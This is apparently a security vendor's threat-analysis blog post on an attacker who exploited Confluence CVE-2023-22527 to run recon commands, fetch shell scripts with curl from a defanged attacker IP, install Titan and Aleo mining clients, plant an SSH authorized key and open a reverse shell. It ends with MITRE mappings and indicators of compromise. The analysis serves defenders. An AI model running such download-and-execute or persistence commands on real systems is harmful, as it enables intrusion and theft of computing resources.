Cyber Threats
In this blog post, we delve into how a criminal exploited the Atlassian Confluence vulnerability CVE-2023-22527 to tether servers to the Titan Network for cryptocurrency mining purposes.
Read time: ( words)
Overview
- Researchers at Trend Micro observed a criminal leveraging the Atlassian Confluence vulnerability CVE-2023-22527 to execute remote code for cryptocurrency mining via the Titan Network.
- The malevolent individual utilized public IP lookup services and diverse system commands to obtain information about the compromised machine.
- The exploit comprised fetching and running multiple shell scripts to install Titan binaries and link to the Titan Network under the attacker’s identity.
- The criminal connects compromised systems to the Cassini Testnet, granting them access to the delegated proof of stake system for token rewards.
An attack was recently witnessed where a criminal exploited the Atlassian Confluence server vulnerability CVE-2023-22527. This flaw allowed unauthorized individuals to trigger remote code execution (RCE) and utilize the Titan Network for cryptocurrency mining operations. Titan Network, which utilizes decentralized physical infrastructure networks (DePIN), is a platform that facilitates users in sharing and deploying hardware resources, converting them into valuable digital assets such as computational power, storage, and bandwidth. Its network design and economic incentives ensure that contributors receive compensation for their resources, while consumers benefit from top-tier, reliable services akin to contemporary cloud solutions. In this assault, the criminal compromises victims’ machines and installs Titan edge nodes to harvest those benefits.
Sequence of Attack
The criminal attempted to compromise the Atlassian Confluence server using CVE-2023-22527, an unauthenticated template injection flaw. Within the assault payload, the criminal sets a response header “Cmd,” which contains the outcomes of the executed commands. The attack kicks off with the execution of the “ls” command by the criminal to check the files in the existing directory; the response from this command can be viewed in the “Cmd” response header (Figure 2).
Next, the intruder operates the “pwd” directive to discover the current operational location, detailed in Figure 3.
The criminal inspects the files in “/tmp” utilizing the “ls /tmp” directive. Further, they retrieve operating system details using the “cat /etc/os-release” directive and gather system details using the “uname -a” directive to execute commands remotely. They are executing system directives similarly to how they employed “exec({‘curl ip-api.com’})” to run commands on the victim’s device, as depicted in Figure 4. Once essential system information is gathered, the attacker scrutinizes the control group (cgroup) data for the process with PID 1, usually the “init” process in a Linux ecosystem. This action aims to determine if the Atlassian Confluence server operates within a container, the output from which could be exploited for future privilege elevation.
The attacker executes remote commands, akin to their actions in Figure 4, to assess system resources such as disk space using “df –h” and “free -g” directives to identify available memory. As illustrated in Figure 6, after collecting all requisite system and resource particulars, the intruder downloads a shell script file labeled “0” to the “/tmp” directory as a0 on the compromised server linked to 3[.]39[.]22[.]13. To evade file extension-based detections, the attacker refrains from adding a file extension.
The downloaded shell script depicted in Figure 6 fetches the file “titan.tar.gz” from the same server, then unpacks the Executable and Linkable Format (ELF) files “titan-edge” and “libgoworkerd.so” into the “/tmp” directory (Figure 7).
Another shell script file named “1” was acquired in the “/tmp” directory as “a1” through the curl -o /tmp/a1 3[.]39[.]22[.]13/1 command in a similar manner to the “0” script file download, which overwrites the “LD_LIBRARY_PATH” environment variable. Nevertheless, “LD_LIBRARY_PATH” is erroneously noted as “LD_LIZBRARY_PATH”; it remains indistinct if this mistake was intentional. Subsequently, the “titan-edge” daemon commences establishing a linkage with the Titan network (Figure 8). The attacker gets connected to “Cassini Testnet”, comprising two primary components:
- Blockchain Network – Operated on the Delegated Proof of Stake (DPOS) mechanism, participants gain rewards by allocating TTNT test tokens for engagement in chain governance and interaction
- Resource Network – If dormant hardware resources exist, users can operate Titan nodes to earn TNT3 point rewards
The third shell script, dubbed “2”, was fetched to the “/tmp” folder as “a2” via the “curl -o /tmp/a2 3[.]39[.]22[.]13/2” command, mirroring the preceding steps. This script launches a “titan-edge” binary with “storage-size” and “storage-path” settings. The device is then linked to “titan-edge” with the intruder’s identity code, “08DA69AE-6E7C-43F2-A8D0-D97D7FF517A1” (Figure 9).
Similar to the prior steps, the intruder saves the fourth shell script file, named “a3,” to the “/tmp” folder using the command “curl -o /tmp/a3 3[.]39[.]22[.]13/3,” capturing the node’s distinct identifier with the “info” parameter, and storing it in the “info.log” file (Figure 10).
The fifth shell script file, denoted as “a4,” is fetched into the “/tmp” directory through the command “curl -o /tmp/a4 3[.]39[.]22[.]13/4,” designed to halt the operation of the “titan-edge” daemon (Figure 11).
Following the download of all essential files to the target machine, the attacker verifies their presence in the “/tmp” directory (Figure 12).
Subsequently, the attacker triggers the execution of the primary downloaded file, “a0,” depicted in the image shown in Figure 13.
This particular script fetches the necessary “titan-edge” binaries from “titan.tar.gz” as discussed earlier. It then validates the existence of the acquired file by remotely executing the command “ls -lh /tmp” using the attack payload.
Upon confirming the successful download of the “titan-edge” binaries into the system, the attacker proceeds to execute various other scripts (a1, a2, a3, and a4). These scripts enable the Titan binaries, establish a connection to the Titan network, and associate the Titan Network with the attacker’s credentials. Concurrently, the attacker introduces additional shell scripts labeled “5,” “6,” “7” as “a5,” “a6,” and “a7” correspondingly. The “a5” script serves as a backup plan: should the “a0” script fail to download and extract the files correctly, this script will fetch the same Titan binaries from the official Titan GitHub repository.
After establishing a successful connection to the Titan Network and deploying the “aleo-pool” client to link with the “zkRush Pool” server and “Aleo TestNet Beta” for cryptographic mining via the “a6” script (Figure 14).
By executing the “aleo-pool” client through the “a7” script, the system establishes a connection with the aleo[.]zkrush[.]com mining pool server.
Additional files were discovered on the attacker’s file server, potentially utilized for probing lateral movements through SSH within the Amazon Web Services (AWS) cloud environment. In the “a8” script, the attacker downloads and implements the SSH public key in RSA format within the root user’s directory at “/root/.ssh/authorized_keys”.
The SSH public key discovered is as follows:
“ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl+1YDRZdck+HOkzQwdAWzLkdn1Ws1jmgE9aC93iUuzJlpsMhKkkkziWozsYZrQv7j3Tx1QWtSZg8J5VxMmSY0MhzefdhTYZ0Pf9XYPlVsQiLkBTDeoKyyWZS4NwZBysSzE20/jq0Ke4tnFIEe39lP1OaIShLofktHKXsx0xUkfDxFMiDgw2nB4cXhATqdhC3nFQXl0wdlzih0/Yw+QlHoZbQ6/3kJIdw7kWL1N8GcAkjUtaRK6vONwluEi9HIyNsLVUVqS74v4NNRdKA8Rwdg8R5CQSRnzXaD3e+5tmFIkSzArIQQVktDt+Re6z4ZVYFfNfdjCxeqGTJLP6Yt/iE7 aaaaaa-1%”
The “a9” file represents an altered SSH configuration file that the attacker might use later to manipulate the current SSH configuration. This modified file contains two prominent directives, “AuthorizedKeysCommand” and “AuthorizedKeysCommandUser” (Figure 17).
The SSH daemon employs “AuthorizedKeysCommand” and “AuthorizedKeysCommandUser,” specified during the installation of Instance Connect, to retrieve the public key from the instance metadata for authentication.and connect to the EC2 virtual machine.
We have observed a different version of the document named “7”, which initiates the bash reverse shell to the C&C server 13[.]236[.]179[.]8 through tcp port 80 (Figure 18).
Summary
Through the execution of a series of reconnaissance, payload deployment, and persistence mechanisms, the attacker effectively enlisted server resources to assimilate compromised systems into the Titan Network for their economic gain. This occurrence emphasizes the significance of maintaining current security patches, stringent network and file monitoring, and strong access controls.
To reduce the probability of this kind of risk, organizations can also evaluate potent security technologies like Trend Vision One™, which provides layered protection and behavior detection, aiding in blocking malicious tools and services before they can bring harm to user machines and systems.
MITRE ATT&CK methodologies
| Tactic | Technique | Technique ID |
| Initial Entry | Exploit Public-Facing Application | T1190 |
| Exploration | System Information Exploration | T1082 |
| File and Directory Exploration | T1083 | |
| Process Exploration | T1057 | |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Persistence | Hijack Execution Flow: Dynamic Linker Hijacking | T1574.006 |
| Account Manipulation: SSH Authorized Keys | T1098.004 | |
| Command and Control | Ingress Tool Transfer | T1105 |
| Application Layer Protocol: Web Protocols | T1071.001 |
Signs of Compromise (IOCs)
- http://3[.]39[.]22[.]13/0
- http://3[.]39[.]22[.]13/1
- http://3[.]39[.]22[.]13/2
- http://3[.]39[.]22[.]13/3
- http://3[.]39[.]22[.]13/4
- http://3[.]39[.]22[.]13/5
- http://3[.]39[.]22[.]13/6
- http://3[.]39[.]22[.]13/7
- http://3[.]39[.]22[.]13/8
- http://3[.]39[.]22[.]13/9
- wss[:]//aleo[.]zkrush[.]com:3333
- 13[.]236[.]179[.]8
- 35[.]74[.]215[.]126
Tags
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
About Author
